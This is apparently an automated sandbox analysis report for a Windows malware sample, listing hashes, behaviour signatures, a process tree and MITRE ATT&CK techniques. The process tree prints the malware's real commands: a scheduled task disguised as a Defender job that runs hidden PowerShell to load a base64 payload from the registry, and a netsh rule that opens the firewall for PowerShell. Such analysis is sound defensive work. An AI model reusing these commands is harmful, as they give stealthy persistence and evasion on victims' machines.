Overview

overview

8

Static

static

3

204d12339a...9c.exe

windows7-x64

8

204d12339a...9c.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/10/2024, 19:33

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    204d12339aee656dd74ae793af50b97780da2297716a222ca9d5e5716b1e729c.exe

  • Size

    127KB

  • MD5

    572c427f4a6204d0c1d16840e3ea6807

  • SHA1

    db81d828a801af0ea640aa186df1a17fb9fe75d7

  • SHA256

    204d12339aee656dd74ae793af50b97780da2297716a222ca9d5e5716b1e729c

  • SHA512

    b9e27e057914e8b5fa2deb370d3e0ea32b51dc306a4e4fcc9cd903841674835d748755a7872129cdcb399f95cfcd5f4848ef7c97b70bba8e1c40cf8e5700f0e8

  • SSDEEP

    3072:Z63Q77Nv63Q77NWTSjPXw23TGB4VasGu3T4ya:IQ7JeQ7Jugvw2Q6asGb

Score
8/10
discoveryevasionexecutionpersistenceprivilege_escalation

Malware Config

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\204d12339aee656dd74ae793af50b97780da2297716a222ca9d5e5716b1e729c.exe
    "C:\Users\Admin\AppData\Local\Temp\204d12339aee656dd74ae793af50b97780da2297716a222ca9d5e5716b1e729c.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:624
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "WindowsDefenderTakshots" /tr "powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [Reflection.Assembly]::Load([System.Convert]::Frombase64String((Get-ItemProperty HKCU:\Software).micro)).EntryPoint.Invoke($null,$null)::[Reflection.Assembly]"
      2⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:3116
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [Reflection.Assembly]::Load([System.Convert]::Frombase64String((Get-ItemProperty HKCU:\Software).micro)).EntryPoint.Invoke($null,$null)::[Reflection.Assembly]
    1⤵
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1012
    • C:\Windows\system32\netsh.exe
      netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "powershell.EXE" ENABLE
      2⤵
      • Modifies Windows Firewall
      • Event Triggered Execution: Netsh Helper DLL
      PID:560

Network

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        Command and Scripting Interpreter

        1
        T1059

        PowerShell

        1
        T1059.001

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Persistence

        Create or Modify System Process

        1
        T1543

        Windows Service

        1
        T1543.003

        Event Triggered Execution

        1
        T1546

        Netsh Helper DLL

        1
        T1546.007

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Privilege Escalation

        Create or Modify System Process

        1
        T1543

        Windows Service

        1
        T1543.003

        Event Triggered Execution

        1
        T1546

        Netsh Helper DLL

        1
        T1546.007

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Defense Evasion

        Impair Defenses

        1
        T1562

        Disable or Modify System Firewall

        1
        T1562.004

        Credential Access

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        System Location Discovery

        1
        T1614

        System Language Discovery

        1
        T1614.001

        Lateral Movement

        Collection

        Command and Control

        Exfiltration

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_boefinlg.2pw.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • memory/624-0-0x0000000074F32000-0x0000000074F33000-memory.dmp

          Filesize

          4KB

          Download

        • memory/624-1-0x0000000074F30000-0x00000000754E1000-memory.dmp

          Filesize

          5.7MB

          Download

        • memory/624-2-0x0000000074F30000-0x00000000754E1000-memory.dmp

          Filesize

          5.7MB

          Download

        • memory/624-4-0x0000000074F30000-0x00000000754E1000-memory.dmp

          Filesize

          5.7MB

          Download

        • memory/1012-7-0x000001E236E60000-0x000001E236E82000-memory.dmp

          Filesize

          136KB

          Download

        • memory/1012-6-0x00007FF91EBA0000-0x00007FF91F661000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1012-5-0x00007FF91EBA3000-0x00007FF91EBA5000-memory.dmp

          Filesize

          8KB

          Download

        • memory/1012-17-0x00007FF91EBA0000-0x00007FF91F661000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1012-18-0x000001E2518D0000-0x000001E251914000-memory.dmp

          Filesize

          272KB

          Download

        • memory/1012-19-0x000001E236E90000-0x000001E236E9E000-memory.dmp

          Filesize

          56KB

          Download

        • memory/1012-20-0x000001E2519A0000-0x000001E251A16000-memory.dmp

          Filesize

          472KB

          Download

        • memory/1012-21-0x00007FF91EBA3000-0x00007FF91EBA5000-memory.dmp

          Filesize

          8KB

          Download

        • memory/1012-22-0x00007FF91EBA0000-0x00007FF91F661000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1012-23-0x00007FF91EBA0000-0x00007FF91F661000-memory.dmp

          Filesize

          10.8MB

          Download